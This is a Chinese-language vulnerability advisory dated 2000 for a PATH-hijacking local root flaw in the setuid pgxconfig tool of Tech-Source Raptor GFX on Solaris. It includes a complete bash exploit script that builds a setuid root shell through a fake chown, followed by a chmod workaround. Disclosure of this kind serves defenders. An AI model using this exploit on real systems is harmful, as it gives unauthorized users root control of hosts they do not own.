发布日期：2000-08-15
更新日期：2000-08-15

受影响系统：

Tech-Source Raptor GFX PGX32 2.3.1
   - Solaris 8
   - Solaris 7.0
   - Solaris 2.6
   - Solaris 2.5.1

不受影响系统：

描述：

---

Tech-Source Raptor GFX得配置工具为一个pgxconfig的程序，它缺省被安装在
/usr/sbin下并设置了4555属性。

系统中的任意用户都可以使用这个命令来改变openwin的配置。这个程序通过
system("cp")将一个已经存在的配置文件做一个备份。pgxconfig在执行system()
前已经了执行了setuid(0),因此实际system()是以root身份运行的。由于它没有
检查$PATH环境变量，使用了相对路径，导致攻击者可以通过修改PATH变量，创建
假程序来欺骗pgxconfig去执行恶意命令。攻击者可能获取本地root权限。


<* 来源：suid (suid@SUID.KG) *>







测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/local/bin/bash

# TechSource Raptor GFX configurator root exploit
# suid@suid.kg

# unfortunately a compiler must be installed to use this example
# exploit. however there's a million ways around this you know

# on my system , gcc isnt in my path
PATH=$PATH:/usr/local/bin

# build a little prog nothing new here folks
echo '#include<stdio.h>' > ./x.c
echo 'int main(void) { setuid(0); setgid(0); execl
("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
gcc x.c -o foobar
rm -f ./x.c

# build a substitute chown command. i much prefer this over
        # regular chown
echo "#!/bin/sh" > chown
echo "/usr/bin/chown root ./foobar" >> chown
echo "/usr/bin/chmod 4755 ./foobar" >> chown
chmod 0755 chown

# oooh look its the magical fairy path variable
export PATH=.:$PATH

# heres one way to skin a cat
# (theres more, some need valid devices. excercise for the readers)
/usr/sbin/pgxconfig -i
rm -f chown

/foobar


建议：

---

暂无
临时解决方法：

禁止使用pgxconfig或者取消set uid位
# chmod 0 /usr/sbin/pgxconfig

或

# chmod 0511 /usr/sbin/pgxconfig


浏览次数：6000
严重程度：0（网友投票）